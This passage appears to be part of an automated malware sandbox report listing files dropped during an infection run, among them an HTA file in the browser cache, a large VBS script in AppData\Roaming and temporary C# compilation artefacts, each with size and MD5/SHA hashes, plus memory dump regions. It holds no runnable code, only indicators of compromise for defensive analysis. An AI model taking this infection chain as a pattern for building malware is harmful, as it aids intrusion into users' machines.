    24a21f4ac32089a9c442f2bbbab7c75c0cb7f6bf58932421ef46c8b523195e536520fa615795f0f2ce48b111906135f106d4d7043ba9c61711e14dd24a8fac45

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894

    Filesize

    432B

    MD5

    8926de42b009c839ba6fee717e05224c

    SHA1

    96e282be739b499206c7e59308ca5db916a53f58

    SHA256

    68762245efc87ee716b7dfa8a54cedc243894300084c2096a391f9bf9d1f0891

    SHA512

    1bfdc869fb466b5b9cd4b4b8342d68eefac50e203e987f3e13b7a87ea685d21e276afeca46d37fdb31eebed2e5288bca6cde47107f63ed772db099d1b40a5f1a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F53EB4E574DE32C870452087D92DBEBB_2EEDDB29953A46217D3D6BE21EA36A5B

    Filesize

    426B

    MD5

    9c7b1b244d1c1f3b0bbccc1bddc3886e

    SHA1

    dea53c150d7e95d3f1d8302ba2da717067c162e9

    SHA256

    8fecf362484ca2c904ac0f1020c92eb1d8d1fa0789865b9d213aac657df3641c

    SHA512

    68c1f513267379d91b965671d95f9d27e615bc23f1aef13965c2a24bda8d651e9906113572a5b741c6132bc139efd95b74bb246f24db598f046044abd7efef19

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DUME8XYE\wecreatdbestthingswithgreatthingsentiretimeeverywheregoodhappy[1].hta

    Filesize

    8KB

    MD5

    552093c811bbc7be144296b66144b9a2

    SHA1

    67377ed35b84dd08b6bd1612d20379cc31482e18

    SHA256

    92251c4a9e0172e074c732ed052251b68d15843b00b466dc233fcb211ec02140

    SHA512

    0bb1ccee11b257097ca5e828fcdb02ea6b4283975bfa17bc6a86b579d020177a33c30b7f9fff27157caa03b1ffc52e1929633a322180fafaac680f252dae979a

  • C:\Users\Admin\AppData\Local\Temp\Cab396B.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RES5BF6.tmp

    Filesize

    1KB

    MD5

    ef5768950f2875616adf4d81e5cd5e70

    SHA1

    60a79022128e0a83e5812bfdeae6eae9785fae15

    SHA256

    83f8749d231a7322f176e54f045e7be2e5c1e2012e7d4671870822db8306f319

    SHA512

    c4ef5c4a87e772574be663f9f17e60f0bd6815af47b7e115b601251ad1268b4eeff0e596405046d911bce735833e3233db4b7713a5ddf2e534e762e81039dbda

  • C:\Users\Admin\AppData\Local\Temp\Tar39AC.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\xnxpjgur.dll

    Filesize

    3KB

    MD5

    531065ae2d5daf7ae6451d4fc92089b9

    SHA1

    5bd651a33fdb35d4ac2ddd67017987d88b08df6d

    SHA256

    3a1dc84c172e336ac691cf84a07cc45096eeee4a813cfc14e2698d6ac16af1f2

    SHA512

    41eec43babc83b4f67cee5a3b47f0dc7f08883df04810e19aa664024ee04f51a1f95e39b86ffffccb4ca4cc3a6fa5df4ca5fdb16c52272590f399aa7dee5cf32

  • C:\Users\Admin\AppData\Local\Temp\xnxpjgur.pdb

    Filesize

    7KB

    MD5

    656b5ac6898936eca869fece1c306ff5

    SHA1

    b453b8b956d99b48e2ce9a85f607771af118b35a

    SHA256

    d790bd338643a28fe110bfe167631733d4cf38f5c9d65a13c733cd120649d16d

    SHA512

    10a04bc75e61b2633fb9201fa123a9f2d98b405b62aaef3b97ae96a3abd514a917d81ac91af8cd804e2d7574eeef8d75bed8c7de86447fd10197b432905d2290

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    0414348e057db42f478bb8407d9b90a2

    SHA1

    5784088e389bd705137236180f74d9718ff9dfd3

    SHA256

    9ae64645e7960b28d06bffa2e77ff5cb64c60a5ac679a36dc3210e2d0a972955

    SHA512

    4016f24e4acfbb49c967168ca1da4f932d953cac51e9ee31a665ff181dfe0dac8967eee7c23dc67f3f59e91bd074b0162cff7699dc21462876b6b5f193e5b19a

  • C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodnewsgivenmegreatw.vbs

    Filesize

    138KB

    MD5

    6d668e698465e2b247c18af64cd92768

    SHA1

    9f0d8dc1bf9863ce10df0779404b46f11e05878e

    SHA256

    ebe21b018238666a7386c805e391635b4a6a1397be0cebcc1cd1a0b4c2a9ac03

    SHA512

    53d6e582ad8ab0a373183e4825a829ab9788dcd965b76912b2666a0ad6e17233f100a2c9916fc9bb36c6034a4b21588ac26793f87f7f66b2f5037652ea989d8e

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC5BE6.tmp

    Filesize

    652B

    MD5

    a907c6e7244ccf755cfed07ec584cc6a

    SHA1

    dfa1e039f71381da85a85613f651f0598b6e7586

    SHA256

    efdf5a80e519f177be02d507f02e7fc05f0a2b609e373cbff6dd76ab86bac56d

    SHA512

    3302de3cea1463d818a6cb67f7eea49b4a55dae126fac68a4f32e87bdac1d8f4eee474eaffe159c35a91553ff9de1f2774c2a9611510fb39e590aea541b46f90

  • \??\c:\Users\Admin\AppData\Local\Temp\xnxpjgur.0.cs

    Filesize

    483B

    MD5

    0d07f4ab30ba01353f767eca7b280b1a

    SHA1

    b5b6d65652a490f5eeeaf899884cec55cc09d455

    SHA256

    f7082f6db40c262a4b1f34cbf2e9a8ed8a97090e49968d630cb087d1a62ef31e

    SHA512

    001b1bd234cf1f9dacf6fa54fad0857277c4c349c2f615fb4f6d2c1dc064a249594aedb1c9587a7f1eba1de1a9aa825e5f415248ddc9379475723105524165a3

  • \??\c:\Users\Admin\AppData\Local\Temp\xnxpjgur.cmdline

    Filesize

    309B

    MD5

    1bdbbcf115196413a053f2345bef4da9

    SHA1

    31b85ebec8867e1a38d66764b71e24675bb05157

    SHA256

    f65f215290355666e8c8b80baaf89dc3f153c0aa25deefc56e14f313a66c4ea5

    SHA512

    b087ebe9ca81f8333940f247de694cfe721a82dda98a505dea4ef9a7ff66a6de47af3d70bcce4995faea831eb5654f87b4261ae4785ab28a2628eac63745cf42

  • memory/840-136-0x0000000002F80000-0x0000000002F82000-memory.dmp

    Filesize

    8KB

  • memory/840-165-0x000000007261D000-0x0000000072628000-memory.dmp

    Filesize

    44KB

  • memory/840-1-0x000000007261D000-0x0000000072628000-memory.dmp

    Filesize

    44KB

  • memory/840-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2540-135-0x0000000002C00000-0x0000000002C02000-memory.dmp

    Filesize

    8KB